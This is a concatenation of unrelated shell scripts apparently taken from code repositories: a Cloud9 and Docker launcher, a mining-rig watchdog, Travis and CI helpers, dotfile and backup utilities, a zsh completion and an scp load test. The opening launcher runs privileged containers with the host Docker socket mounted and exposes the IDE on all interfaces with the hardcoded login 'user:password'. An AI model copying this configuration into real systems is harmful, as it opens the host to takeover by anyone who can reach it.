--parent)
PARENT=${2} &&
shift &&
shift &&
true
;;
esac &&
true
done &&
# ---- one anonymous volume per concern ----------------------------------
WORKSPACE_VOLUME=$(docker volume create) &&
INIT_VOLUME=$(docker volume create) &&
BIN_VOLUME=$(docker volume create) &&
PROJECT_VOLUME=$(docker volume create) &&
# ---- init.sh: launches the "strongarm" side container. \$ sequences are
# escaped so they expand when the generated script runs, not now. --------
(cat <<EOF
#!/bin/sh
docker \
run \
--interactive \
--tty \
--detach \
--cidfile /root/cid \
--volume ${WORKSPACE_VOLUME}:/workspace/${PROJECT_NAME} \
--volume /var/run/docker.sock:/var/run/docker.sock \
--privileged \
--volume /tmp/.X11-unix:/tmp/.X11-unix:ro \
--net host \
--workdir /workspace/${PROJECT_NAME} \
--env DISPLAY \
--volume /home/vagrant/.ssh:/root/.ssh:ro \
--volume /home/vagrant/bin:/root/bin:ro \
--volume /home/vagrant/.bash_profile:/root/.bash_profile:ro \
--volume ${PROJECT_VOLUME}:/init \
emorymerryman/strongarm:0.1.3 \
&&
echo \${HOME}/bin/shell.sh >> /etc/shells &&
chsh --shell \${HOME}/bin/shell.sh &&
true
EOF
) | volume-tee.sh ${INIT_VOLUME} init.sh &&
# ---- shell.sh: exec into the side container recorded in /root/cid ------
(cat <<EOF
#!/bin/sh
docker exec --interactive --tty \$(cat /root/cid) env CONTAINER_ID=\$(cat /root/cid) bash --login &&
true
EOF
) | volume-tee.sh ${BIN_VOLUME} shell.sh &&
docker run --interactive --tty --rm --volume ${BIN_VOLUME}:/usr/local/src alpine:3.4 chmod 0500 /usr/local/src/shell.sh &&
# ---- project init: set up the git repository inside the workspace ------
(cat <<EOF
#!/bin/sh
git -C /workspace/${PROJECT_NAME} init &&
ln --symbolic --force /root/bin/post-commit.sh /workspace/${PROJECT_NAME}/.git/hooks/post-commit &&
( [ -z "${EMAIL}" ] || git -C /workspace/${PROJECT_NAME} config user.email "${EMAIL}" ) &&
( [ -z "${NAME}" ] || git -C /workspace/${PROJECT_NAME} config user.name "${NAME}" ) &&
( [ -z "${UPSTREAM}" ] || git -C /workspace/${PROJECT_NAME} remote add upstream ${UPSTREAM} ) &&
( [ -z "${ORIGIN}" ] || git -C /workspace/${PROJECT_NAME} remote add origin ${ORIGIN} ) &&
( [ -z "${PARENT}" ] || git -C /workspace/${PROJECT_NAME} fetch upstream ${PARENT} && git -C /workspace/${PROJECT_NAME} checkout upstream/${PARENT} ) &&
git -C /workspace/${PROJECT_NAME} checkout -b scratch/$(uuidgen) &&
true
EOF
) | volume-tee.sh ${PROJECT_VOLUME} init.sh &&
# ---- start the Cloud9 IDE container itself -----------------------------
docker \
run \
--volume ${BIN_VOLUME}:/root/bin:ro \
--interactive \
--tty \
--detach \
--volume /var/run/docker.sock:/var/run/docker.sock:ro \
--privileged \
--volume ${WORKSPACE_VOLUME}:/workspace/${PROJECT_NAME} \
--expose 8181 \
--publish-all \
--volume ${INIT_VOLUME}:/init:ro \
--env DISPLAY \
emorymerryman/cloud9:4.0.7 \
--listen 0.0.0.0 \
--auth user:password \
-w /workspace/${PROJECT_NAME} \
&&
docker ps --latest &&
true
| true
|
63ae680cf194c5d3346e878125e3e57b8bd11af6
|
Shell
|
feng-hui/python_books_examples
|
/linux_private_kitchen/chapter_12/cal_pi.sh
|
UTF-8
| 446
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
# Program
#	User input a scale number to calculate pi number.
# History
#	2019-07-16 FengHui First Release

# BUGFIX: use the standard upper-case PATH variable; assigning/exporting a
# lower-case "path" has no effect on command lookup in bash.
PATH=/bin:/sbin:/usr/bin:~/bin
export PATH

echo -e "This program will calculate pi value. \n"
echo -e "You should input a float number to calculate pi value. \n"
read -p "The scale number (10-1000) ?" checking
# Default to 10 decimal places when the user just presses Enter.
num=${checking:-"10"}
echo -e "Starting calculate pi value.Be patient."
# pi = 4 * arctan(1); -l loads bc's math library (a = arctan).
time echo "scale=${num}; 4*a(1)" | bc -lq
| true
|
10ac325a46908ec403fb6bfec692f0b0b40c112b
|
Shell
|
a-pog/honey
|
/bin/wd
|
UTF-8
| 4,010
| 3.21875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Hashrate watchdog: runs in a detached screen session and restarts the
# miner or reboots the rig when the reported hashrate stays too low.

SERVER_CONF="/honey/conf/server.conf"
RIG_CONF="/honey/conf/rig.conf"
RIG_CONF_FEE="/tmp/rig_fee.conf"
LOGS_FILE="/honey/log/miner.log"
RIG_STATE="/tmp/state"

# Timing knobs (seconds).
TIME_SLEEP=10
TIME_RESTART=60 #180
TIME_REBOOT=120 #300
TIME_NOTIFY=$TIME_RESTART
ATTEMPT_RESTART_MAX=3
MIN_HASH=

. colors

if [ ! -f $RIG_CONF ]; then
    echo -e "${RED}No config $RIG_CONF${NOCOLOR}"
else
    . $RIG_CONF
fi

countRestart=0

# Launch the watchdog loop in a detached screen session named "watchdog"
# (no-op with a warning if one is already running).
function start() {
    session_count=`screen -ls watchdog | grep watchdog | wc -l`
    if [[ $session_count > 0 ]]; then
        echo -e "${YELLOW}watchdog screen is already running${NOCOLOR}"
        # screen -x watchdog
        return
    fi
    screen -dmS watchdog wd loop
    sleep 0.3
    count=`screen -ls watchdog | grep watchdog | wc -l`
    if [[ $count -eq 0 ]]; then
        echo -e "${RED}ERROR start watchdog${NOCOLOR}"
    # else
    # screen -x watchdog
    fi
}

# Attach to the running watchdog screen session; show usage on failure.
function monitor() {
    echo -e "Lets monitor"
    screen -x -S watchdog
    [[ $? != 0 ]] && help
}

# Record "hashrate looked fine just now" and clear the pending-notify flag.
function nowGood() {
    lastTimeGood=`date +%s`
    alreadyNotify=0
}

nowGood
attemptRestart=0
lastRestart=0
# Main watchdog loop: while the miner screen session is up, compare the
# reported hashrate with the configured minimum and restart the miner or
# hard-reboot the rig when it stays low for too long.
function loop() {
    echo "start looping"
    while : ; do
        #check if miner started
        session_miner=`screen -ls miner | grep miner | wc -l`
        if [[ $session_miner -eq 0 ]]; then
            sleep $TIME_SLEEP
            nowGood
            continue
        fi

        #echo "Check WD status"
        . $RIG_CONF
        local wdEnabled=$(echo "$WATCHDOG" | jq -r '.enabled')
        local wdRestart=$(echo "$WATCHDOG" | jq -r '.restart')
        local wdReboot=$(echo "$WATCHDOG" | jq -r '.reboot')
        local minHash=$(echo "$WATCHDOG" | jq -r '.minHash')
        [[ "$wdEnabled" == "null" ]] && wdEnabled=0
        [[ "$wdRestart" == "null" ]] && wdRestart=0
        [[ "$wdReboot" == "null" ]] && wdReboot=0
        [[ "$minHash" == "null" ]] && minHash=0

        # Watchdog disabled, fee-mining in progress, or no minimum set.
        if [[ "$wdEnabled" == false ]] || [[ -f "$RIG_CONF_FEE" ]] || [[ $minHash -eq 0 ]]; then
            echo -e "${YELLOW}Watchdog not activated${NOCOLOR} see variable in config"
            sleep $TIME_SLEEP
            nowGood
            attemptRestart=0
            continue
        fi

        needNotify=1
        . $RIG_STATE
        let "status_hash=$TOTAL_HASH > $minHash"
        if [ $status_hash -eq 1 ]; then
            echo "now good"
            nowGood
        else
            echo -e "${RED}bad${NOCOLOR} TOTAL_HASH - $TOTAL_HASH minHash - $minHash"
        fi

        curDate=`date +%s`
        let "diffGoodAttempt=$curDate - $lastTimeGood"

        if [ $diffGoodAttempt -gt $TIME_REBOOT ] && [ "$wdReboot" == true ]; then
            echo "hr is low, rebooted"
            agent log 1 'WD: hr is low, rebooted'
            honey hardreboot
            sleep 300
            continue
        fi

        if [ $diffGoodAttempt -gt $TIME_RESTART ] && [ "$wdRestart" == true ]; then
            let "var=$curDate-$lastRestart" # to be called after a certain period
            # BUGFIX: numeric comparison needs -gt. Inside [ ], an unquoted
            # ">" is output redirection, so the original test effectively
            # ran [ -n "$var" ] and also created a file named after
            # $TIME_RESTART's value.
            if [ $var -gt $TIME_RESTART ]; then
                echo "Attempt restart - $attemptRestart"
                if [ $attemptRestart -ge $ATTEMPT_RESTART_MAX ] && [ "$wdReboot" == true ]; then
                    agent log 1 'WD: attempt restart max, rebooted'
                    honey hardreboot
                    sleep 300
                    continue
                fi
                agent log 1 'WD: hr is low, restart miner'
                miner restart
                lastRestart=`date +%s`
            fi
            needNotify=0
            let "attemptRestart+=1"
            nowGood
        fi

        if [ $alreadyNotify -eq 0 ] && [ $diffGoodAttempt -gt $TIME_RESTART ] && [ $needNotify -eq 1 ]; then
            echo -e "${RED}hr is low${NOCOLOR}"
            agent log 1 'WD: hr is low'
            alreadyNotify=1
        fi

        sleep $TIME_SLEEP
    done
}
# Kill every screen session named "watchdog".
function stop() {
    screens=`screen -ls watchdog | grep -E "[0-9]+\.watchdog" | cut -d. -f1 | awk '{print $1}'`
    if [[ -n $screens ]]; then
        for pid in $screens; do
            echo "Stopping screen session $pid"
            screen -S $pid -X quit
        done
    fi
}

# Print CLI usage.
function help() {
    bname=`basename $0`
    echo -e "Usage: ${GREEN}$bname - start|stop|restart${NOCOLOR}"
}

# Sub-command dispatch; unknown commands fall through to usage.
case $1 in
    start)
        start
        ;;
    monitor|m)
        monitor
        ;;
    loop)
        loop
        ;;
    stop)
        stop
        ;;
    restart)
        echo -e "${YELLOW}Restarting watchdog${NOCOLOR}"
        stop
        sleep 1
        start
        ;;
    help)
        help
        ;;
    *)
        help
        ;;
esac
| true
|
b0dc1e69045bd895da5cc3ee3a4b10ec6fed2ec7
|
Shell
|
shrekee/code
|
/shell/homework/homework_0725_2.sh
|
UTF-8
| 454
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
# Count down to 2019-01-01 00:00:00: print the remaining days, hours,
# minutes and seconds once per second, forever.
day=0;hour=0;minute=0;second=0;
future=`date -d "2019-1-1 0:0:0 " "+%s"`
while true ;do
    now=`date "+%s"`
    let time=future-now          # total seconds remaining
    let day=time/86400
    let shi=time%86400           # seconds left over after whole days
    let hour=shi/3600
    let fen=shi%3600             # seconds left over after whole hours
    let minute=fen/60
    let second=fen%60
    echo "距离2019年新年元旦还有${day}天${hour}时${minute}分${second}秒"
    sleep 1
done
| true
|
1f212d254f3e5df945d3b503af217114c1626b74
|
Shell
|
Voronenko/toggl_invoice
|
/console_helper/completions/_toggl.zsh
|
UTF-8
| 2,682
| 3.421875
| 3
|
[] |
no_license
|
#compdef toggl
# Zsh completion for the `toggl` CLI wrapper.

# Candidate generators: each prints one completion candidate per line.
__toggl-workspaces() {
  toggl workspaces
}

__toggl-projects() {
  toggl projects | awk '{ print $2 }'
}

# Offer a literal duration placeholder plus the current timestamp.
__toggl-now() {
  echo "''d1:20''"
  echo "'`date '+%Y-%m-%d %H:%M:%S'`'"
}

__toggl-duration() {
  echo "''d1:20''"
}

# Recent entry descriptions (everything before the '@' project marker).
__toggl-recent-entries() {
  toggl ls | grep @ | awk -F'@' '{print $1}'
}

# Describe the toggl sub-commands for the first argument position.
_toggl-commands() {
  local -a commands
  commands=(
    'add: DESCR [:WORKSPACE] [@PROJECT | #PROJECT_ID] START_DATETIME (''d''DURATION | END_DATETIME) creates a completed time entry, DURATION = [[Hours:]Minutes:]Seconds'
    'add: DESCR [:WORKSPACE] [@PROJECT | #PROJECT_ID] ''d''DURATION creates a completed time entry, with start time DURATION ago, DURATION = [[Hours:]Minutes:]Seconds'
    'clients:lists all clients'
    'continue: [from DATETIME | ''d''DURATION] restarts the last entry, DURATION = [[Hours:]Minutes:]Seconds'
    'continue: DESCR [from DATETIME | ''d''DURATION] restarts the last entry matching DESCR'
    'ls:list recent time entries'
    'now:print what you''re working on now'
    'workspaces:lists all workspaces'
    'projects: [:WORKSPACE] lists all projects'
    'rm:delete a time entry by id'
    'start: DESCR [:WORKSPACE] [@PROJECT | #PROJECT_ID] [''d''DURATION | DATETIME] starts a new entry , DURATION = [[Hours:]Minutes:]Seconds'
    'stop:stops the current entry'
    'www:visits toggl.com'
  )
  _arguments -s : $nul_args && ret=0
  _describe -t commands 'toggl command' commands && ret=0
}

# Entry point: complete the command name at position 2, otherwise complete
# the chosen sub-command's positional arguments.
_toggl() {
  local -a nul_args
  nul_args=(
    '(-h --help)'{-h,--help}'[show help message and exit.]'
    '(-q --quiet)'{-q,--quiet}'[don''t print anything]'
    '(-v --verbose)'{-v,--verbose}'[print additional info]'
    '(-d --debug)'{-d,--debug}'[print debugging output]'
  )
  local curcontext=$curcontext ret=1
  if ((CURRENT == 2)); then
    _toggl-commands
  else
    # Shift past the sub-command and re-root the completion context.
    shift words
    (( CURRENT -- ))
    curcontext="${curcontext%:*:*}:toggl-$words[1]:"
    case $words[1] in
      add)
        _arguments "2: :($(__toggl-workspaces))" \
          "3: :($(__toggl-projects))" \
          "4: :($(__toggl-now))" \
          "5: :($(__toggl-duration))"
        ;;
      start)
        _arguments "2: :($(__toggl-workspaces))" \
          "3: :($(__toggl-projects))" \
          "4: :($(__toggl-now))"
        ;;
      stop)
        _arguments "1: :($(__toggl-now))"
        ;;
      projects)
        _arguments "1: :($(__toggl-workspaces))"
        ;;
      continue)
        _arguments "1: :($(__toggl-recent-entries))"
        ;;
    esac
  fi
}
_toggl "$@"

# Local Variables:
# mode: Shell-Script
# sh-indentation: 2
# indent-tabs-mode: nil
# sh-basic-offset: 2
# End:
# vim: ft=zsh sw=2 ts=2 et
| true
|
dec891578e42acd92dce1dd0ef8149addc3a7a43
|
Shell
|
Bourne-ID/rancher-cloud-windows-diag
|
/install-cert-manager.sh
|
UTF-8
| 798
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Install cert-manager v0.9.1 into the cluster described by the RKE-provider
# kubeconfig in the current directory.

# Configuration Path from RKE Provider
kubeconfig="$(pwd)/kube_config_cluster.yml"

# Small wrapper so every kubectl call uses the same kubeconfig.
kc() { kubectl --kubeconfig="$kubeconfig" "$@"; }

# Initialize Helm and register the jetstack chart repository.
helm init --service-account tiller --kube-context local --kubeconfig "$kubeconfig" --wait
helm repo add jetstack https://charts.jetstack.io
helm repo update

# Install the cert-manager CRDs and prepare its namespace.
kc apply -f https://raw.githubusercontent.com/jetstack/cert-manager/release-0.9/deploy/manifests/00-crds.yaml
kc create namespace cert-manager
kc label namespace cert-manager certmanager.k8s.io/disable-validation=true

helm install \
  --name cert-manager \
  --namespace cert-manager \
  --kube-context local \
  --kubeconfig "$kubeconfig" \
  --version v0.9.1 \
  --wait \
  jetstack/cert-manager
| true
|
560051a2ea303f3411198f84d313cdc2c85ab934
|
Shell
|
alex-cory/fasthacks
|
/dotfiles/zsh/oh-my-zsh/tools/upgrade.sh
|
UTF-8
| 856
| 2.9375
| 3
|
[] |
no_license
|
# Oh My Zsh self-upgrade: pull the latest master into $ZSH in a subshell
# (so the caller's cwd is untouched), print the banner, then return to the
# directory we started in.
current_path=`pwd`
echo -e "\033[0;34mUpgrading Oh My Zsh\033[0m"
( cd $ZSH && git pull origin master )
echo -e "\033[0;32m"' __ __ '"\033[0m"
echo -e "\033[0;32m"' ____ / /_ ____ ___ __ __ ____ _____/ /_ '"\033[0m"
echo -e "\033[0;32m"' / __ \/ __ \ / __ `__ \/ / / / /_ / / ___/ __ \ '"\033[0m"
echo -e "\033[0;32m"'/ /_/ / / / / / / / / / / /_/ / / /_(__ ) / / / '"\033[0m"
echo -e "\033[0;32m"'\____/_/ /_/ /_/ /_/ /_/\__, / /___/____/_/ /_/ '"\033[0m"
echo -e "\033[0;32m"' /____/ '"\033[0m"
echo -e "\033[0;34mHooray! Oh My Zsh has been updated and/or is at the current version.\033[0m"
echo -e "\033[0;34mTo keep up on the latest, be sure to follow Oh My Zsh on twitter: \033[1mhttp://twitter.com/ohmyzsh\033[0m"
cd "$current_path"
| true
|
db35e860965b95230a2d491de7c4ffd048da9e2b
|
Shell
|
UiS-IDE-NG/neat
|
/ci/run-test
|
UTF-8
| 3,056
| 3.65625
| 4
|
[] |
permissive
|
#!/usr/bin/env bash
#
# Travis CI Scripts
# Copyright (C) 2018-2020 by Thomas Dreibholz
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: dreibh@iem.uni-due.de

# Bash options:
set -e

# ====== Get settings =======================================================
# $1 selects the target, e.g. "ubuntu_bionic-pbuilder" or
# "freebsd_12.1-compile-clang"; the regex splits it into OS, release,
# build tool and optional compiler suffix (captured in BASH_REMATCH).
export TRAVIS_OS_NAME="linux"
if [[ "$1" =~ ^(debian|ubuntu|fedora|freebsd)_([a-zA-Z0-9]*|[0-9\.]*)-(pbuilder|mock|compile)(|-gcc|-clang)$ ]] ; then
   if [ "${BASH_REMATCH[1]}" == "freebsd" ] ; then
      # FreeBSD targets run under QEMU, not docker.
      export DOCKER=""
      export QEMU="FreeBSD"
      export VARIANT="${BASH_REMATCH[2]}-RELEASE"
   else
      export DOCKER="${BASH_REMATCH[1]}:${BASH_REMATCH[2]}"
      export VARIANT="${BASH_REMATCH[1]}"
   fi
   export TOOL="${BASH_REMATCH[3]}"
   COMPILER="${BASH_REMATCH[4]}"
   echo "DOCKER=${DOCKER}"
   echo "QEMU=${QEMU}"
   echo "VARIANT=${VARIANT}"
   echo "TOOL=${TOOL}"
   # For plain "compile" targets, map the suffix to CC/CXX pairs.
   if [ "${TOOL}" == "compile" -a "${COMPILER}" != "" ] ; then
      if [ "${COMPILER}" == "-gcc" ] ; then
         export COMPILER_C=gcc
         export COMPILER_CXX=g++
      elif [ "${COMPILER}" == "-clang" ] ; then
         export COMPILER_C=clang
         export COMPILER_CXX=clang++
      else
         echo >&2 "ERROR: Bad compiler setting!"
         exit 1
      fi
      echo "COMPILER_C=${COMPILER_C}"
      echo "COMPILER_CXX=${COMPILER_CXX}"
   fi
elif [ "$1" == "" ] ; then
   # ------ Use defaults ----------------------------------
   export DOCKER="ubuntu:bionic"
   export VARIANT="ubuntu"
   export TOOL="pbuilder"
else
   echo >&2 "Usage: $0 [ubuntu|fedora|freebsd]_[release]-[pbuilder|mock|compile-[gcc|clang]]"
   exit 1
fi

# ====== Run test ===========================================================
# Run each CI stage in order, forwarding the settings via env; on failure,
# drop into a shell inside the container for debugging, then fail the job.
SCRIPTS="before-install install build test"
# SCRIPTS="test"
for script in $SCRIPTS ; do
   echo "###### Running $script ... ######"
   sudo env \
      TRAVIS_OS_NAME="$TRAVIS_OS_NAME" \
      DOCKER="$DOCKER" QEMU="$QEMU" \
      VARIANT="$VARIANT" \
      TOOL="$TOOL" \
      COMPILER_C="$COMPILER_C" \
      COMPILER_CXX="$COMPILER_CXX" \
      ci/${script} \
   || {
      echo ""
      echo "====== Something went wrong! Getting shell into the container! ======"
      echo ""
      sudo env \
         TRAVIS_OS_NAME="$TRAVIS_OS_NAME" \
         DOCKER="$DOCKER" QEMU="$QEMU" \
         VARIANT="$VARIANT" \
         TOOL="$TOOL" \
         COMPILER_C="$COMPILER_C" \
         COMPILER_CXX="$COMPILER_CXX" \
         ci/enter
      exit 1
   }
done

echo "###### Build test completed! ######"
| true
|
6328313dafd42574a9fb8a846ba1948faaa9b35e
|
Shell
|
shawwn/scrap
|
/backupdir
|
UTF-8
| 916
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
# usage examples:
#
#    backup the ~/bin folder minus large binary files:
#    $ backupbin
#
#    backup the entire ~/bin folder
#    $ backupbin all
#
#=====================================================================
# main
#=====================================================================

# Positional args: $1 = directory to archive, $2 = destination (default .).
BAK="$1"
DST="${2:-.}"

# DST="$(canonicalize_path "$(resolve_symlinks "$DST")")"
DST="$(realpath "$(realpath "$DST")")"

# Drop the two positionals so "$@" below carries only extra tar options.
shift 1
shift 1

# Archive name: <basename>-<timestamp>[-<LABEL>].
# NOTE(review): `utcstamp` is an external helper — presumably emits a UTC
# timestamp; confirm it is on PATH.
NAME="$(basename "$BAK")"
NAME="$NAME-`utcstamp`";
if [ ! -z "$LABEL" ]; then
	NAME="$NAME-$LABEL"
fi

BAK_DIR="$(dirname "$BAK")"
BAK_SUBDIR="$(basename "$BAK")"

# use $@ to pass in e.g. --exclude=path/some_subfolder
[ ! -d "$DST" ] && mkdir -p "$DST"

# Echo the exact tar command (the heredoc keeps the \$(...) literal), then
# actually run it via command substitution.
cat <<.
\$(cd "$BAK_DIR" ; tar $@ -czvf "$DST/$NAME.tar.gz" "$BAK_SUBDIR/")
.
$(cd "$BAK_DIR" ; tar $@ -czvf "$DST/$NAME.tar.gz" "$BAK_SUBDIR/")
echo "$NAME.tar.gz saved to $(dirname "$DST/$NAME.tar.gz")"
| true
|
f213ed748c3c94367e86370abb8e8d2ac39d06b4
|
Shell
|
nett55/travis-build
|
/lib/travis/build/script/templates/header.sh
|
UTF-8
| 3,203
| 4.21875
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/bin/bash
source /etc/profile
RED="\033[31;1m"
GREEN="\033[32;1m"
RESET="\033[0m"
travis_time_start() {
travis_start_time=$(travis_nanoseconds)
echo -en "travis_time:start\r"
}
travis_time_finish() {
local result=$?
travis_end_time=$(travis_nanoseconds)
local duration=$(($travis_end_time-$travis_start_time))
echo -en "travis_time:finish:start=$travis_start_time,finish=$travis_end_time,duration=$duration\r"
return $result
}
function travis_nanoseconds() {
local cmd="date"
local format="+%s%N"
local os=$(uname)
if which gdate > /dev/null; then
cmd="gdate" # use gdate if available
elif [[ "$os" = darwin ]]; then
format="+%s000000000" # fallback to second precision on darwin (does not support %N)
fi
$cmd -u $format
}
travis_assert() {
local result=$?
if [ $result -ne 0 ]; then
echo -e "\n${RED}The command \"$TRAVIS_CMD\" failed and exited with $result during $TRAVIS_STAGE.${RESET}\n\nYour build has been stopped."
travis_terminate 2
fi
}
# Record the outcome of a test-phase command in the exported
# TRAVIS_TEST_RESULT accumulator: ORs "this command failed" into the
# running flag, so once anything fails it stays 1. Reports the command's
# exit status in green on success, red on failure.
travis_result() {
  local status=$1
  local failed=$(( status != 0 ))
  export TRAVIS_TEST_RESULT=$(( ${TRAVIS_TEST_RESULT:-0} | failed ))
  local color=$GREEN
  [ "$status" -eq 0 ] || color=$RED
  echo -e "\n${color}The command \"$TRAVIS_CMD\" exited with $status."
}
# Hard-stop the build: SIGKILL every direct child of this shell
# (errors ignored) and exit with the given status.
travis_terminate() {
  pkill -9 -P $$ &> /dev/null || true
  exit $1
}
# Run a command under a watchdog so long-quiet commands are not killed by
# Travis' no-output timeout.
#
# Usage: travis_wait [minutes] cmd args...
#   If the first argument looks like an integer it is the timeout in
#   minutes; otherwise 20 minutes is assumed.
# Output is captured to a log file (printed afterwards) while
# travis_jigger emits a keep-alive line every 60s and kills the command
# if the timeout expires. Returns the command's exit status.
travis_wait() {
  local timeout=$1
  if [[ $timeout =~ ^[0-9]+$ ]]; then
    # looks like an integer, so we assume it's a timeout
    shift
  else
    # default value
    timeout=20
  fi
  local cmd="$@"
  # NOTE(review): log file is created in the CWD and never removed.
  local log_file=travis_wait_$$.log
  $cmd &>$log_file &
  local cmd_pid=$!
  # watchdog runs in the background alongside the command
  travis_jigger $! $timeout $cmd &
  local jigger_pid=$!
  local result
  {
    wait $cmd_pid 2>/dev/null
    result=$?
    # stop the watchdog if the command finished before the timeout
    ps -p$jigger_pid &>/dev/null && kill $jigger_pid
  } || return 1
  if [ $result -eq 0 ]; then
    echo -e "\n${GREEN}The command \"$TRAVIS_CMD\" exited with $result.${RESET}"
  else
    echo -e "\n${RED}The command \"$TRAVIS_CMD\" exited with $result.${RESET}"
  fi
  echo -e "\n${GREEN}Log:${RESET}\n"
  cat $log_file
  return $result
}
travis_jigger() {
  # helper method for travis_wait()
  # Prints a keep-alive line once a minute so Travis sees output; if the
  # timeout (in minutes) elapses first, SIGKILLs the watched command.
  local cmd_pid=$1
  shift
  local timeout=$1 # in minutes
  shift
  local count=0
  # clear the line
  echo -e "\n"
  while [ $count -lt $timeout ]; do
    count=$(($count + 1))
    echo -ne "Still running ($count of $timeout): $@\r"
    sleep 60
  done
  echo -e "\n${RED}Timeout (${timeout} minutes) reached. Terminating \"$@\"${RESET}\n"
  kill -9 $cmd_pid
}
# Run a command, retrying up to 3 attempts with a 1s pause between tries.
# Retry/failure notices go to stderr. Returns the last attempt's status.
travis_retry() {
  local result=0
  local count=1
  while [ $count -le 3 ]; do
    [ $result -ne 0 ] && {
      echo -e "\n${RED}The command \"$@\" failed. Retrying, $count of 3.${RESET}\n" >&2
    }
    "$@"
    result=$?
    [ $result -eq 0 ] && break
    count=$(($count + 1))
    sleep 1
  done
  # BUGFIX: after three failures the loop leaves count at 4, so the old
  # "-eq 3" comparison never fired and the final failure notice was never
  # printed; also use echo -e so the escape sequences are interpreted.
  [ $count -gt 3 ] && {
    echo -e "\n${RED}The command \"$@\" failed 3 times.${RESET}\n" >&2
  }
  return $result
}
# Decrypt a base64-encoded, RSA-encrypted secret using the repository's
# private deploy key (~/.ssh/id_rsa.repo); plaintext goes to stdout.
decrypt() {
  echo $1 | base64 -d | openssl rsautl -decrypt -inkey ~/.ssh/id_rsa.repo
}
# ERB template tail: <%= BUILD_DIR %> is substituted by travis-build
# before this script is executed.
mkdir -p <%= BUILD_DIR %>
cd <%= BUILD_DIR %>
# The DEBUG trap keeps TRAVIS_CMD pointing at the command currently
# executing (stripping a leading "travis_retry ") for error messages.
trap 'TRAVIS_CMD=$TRAVIS_NEXT_CMD; TRAVIS_NEXT_CMD=${BASH_COMMAND#travis_retry }' DEBUG
| true
|
f31a41bfa7d42b61d03aad51b9f626848acde683
|
Shell
|
dylanferguson/dotfiles
|
/update.sh
|
UTF-8
| 793
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
# Refresh Homebrew, dump package manifests into the dotfiles repo and
# commit any changes, then update MAS apps and global npm/yarn packages.
set -e

echo 'Updating Brew...'
brew update
brew upgrade
brew cleanup -s
brew doctor
brew missing

pushd "$HOME/.dotfiles"

brew bundle dump --force
# Commit each manifest only when it actually changed.
if [[ -n "$(git diff --stat Brewfile)" ]]; then
    echo 'Updating Brewfile...'
    git add Brewfile
    git commit -m 'auto update Brewfile'
fi

echo 'pipx pkg backup...'
pipx list > pipx.txt
if [[ -n "$(git diff --stat pipx.txt)" ]]; then
    git add pipx.txt
    git commit -m 'pipx pkg list update'
fi

echo 'VSCode backup...'
code --list-extensions --show-versions > vscode/extensions.txt
if [[ -n "$(git diff --stat vscode/extensions.txt)" ]]; then
    git add vscode/extensions.txt
    git commit -m 'vscode extensions update'
fi

echo 'MAS update...'
mas outdated
mas upgrade

echo 'Updating NPM global packages...'
npm update -g
yarn global upgrade

popd
| true
|
16d7e6894c36f9e89382c6ef95875e290bde2b26
|
Shell
|
va1kyrie/test-scripts
|
/testsmalls.sh
|
UTF-8
| 2,237
| 4.125
| 4
|
[] |
no_license
|
#!/bin/sh
# test load of many small file transfers in quick succession
# measures and logs CPU, memory, time, and bandwidth while sending repetitions
# of a small file many times to a specified host (username@host/IP)
#
# Usage: testsmalls.sh USER HOST REPS
TIMESTAMP=$(date +%T%d%m)
ARGS=$#
# BUGFIX: the check read `[ ARGS -ne 3 ]` (literal string, missing $) so it
# never detected bad usage, and $E_WRONGARGS was undefined, which made the
# error path exit 0 (success). Compare the variable and exit non-zero.
if [ "$ARGS" -ne 3 ]; then
    echo "3 arguments needed"
    exit 1
fi
# user and host to send files to
USR=$1
HOST=$2
NAME="$1@$2"
# number of times to send file
REPS=$3
# create the logfiles
mkdir "./$TIMESTAMP"
touch "./$TIMESTAMP/band_log"
LOG_BAND=./$TIMESTAMP/band_log
touch "./$TIMESTAMP/stats_log"
LOG_STATS=./$TIMESTAMP/stats_log
echo "Running Small Files Test"
echo "Running Small Files Test" >> $LOG_STATS
echo "Running Small Files Test" >> $LOG_BAND
# small file to send
echo "File to send (KB): "
# -r keeps backslashes in the path literal
read -r SM
# start the tests
# flags for future reference:
# -i : ignore idle or zombie processes in top
# -b : batch mode for better writing to file
# -d : delay (set to 1 second right now)
# the upshot of -i is that if there is no significant CPU usage going on (as
# in small file copies, for instance), top will print no processes to the file.
# if, however, there is CPU activity (as in some medium and certainly all large
# file transfers, top will return those active processes.)
# had to change this implementation because of differences in VPN implementations.
# also i have no idea why but if i don't put "nohup" there it doesn't work correctly.
# for really small files on normal networks, delay should be .1.
# on tinc, this means you're going to crash atom when you try to open the file.
# so maybe keep it at 1 second for tinc.
nohup top -i -b -d .1 >> $LOG_STATS &
# track bandwidth as well. this should capture all the interfaces, regardless of
# whether the VPN makes a new one.
# no idea if the same issues exist here as with top and nohup vs no nohup, but
# i am not taking any chances.
nohup ifstat -t -T .1 >> $LOG_BAND &
for COUNT in $(seq "$REPS")
do
    echo "\n\n$COUNT File Transfer - $(date +%T)\n\n" >> $LOG_STATS
    scp "$SM" "$NAME":./
    echo "\n\n$COUNT File Transfer Finished - $(date +%T)\n\n" >> $LOG_STATS
done
# make sure everything's ended
kill $(pidof top)
kill $(pidof ifstat)
echo "Finished! Log is at: $LOG_STATS and $LOG_BAND"
| true
|
b34400c6c98027244866cd394e72cccf82a39a35
|
Shell
|
nipengmath/neural_sp
|
/examples/timit/s5/run.sh
|
UTF-8
| 4,861
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash

# Copyright 2018 Kyoto University (Hirofumi Inaguma)
#  Apache 2.0  (http://www.apache.org/licenses/LICENSE-2.0)

# End-to-end ASR recipe for TIMIT: data preparation, fbank feature
# extraction, dictionary/dataset creation, and attention/CTC training.

echo ============================================================================
echo "                                   TIMIT                                     "
echo ============================================================================

stage=0
gpu=

### Set path to save dataset
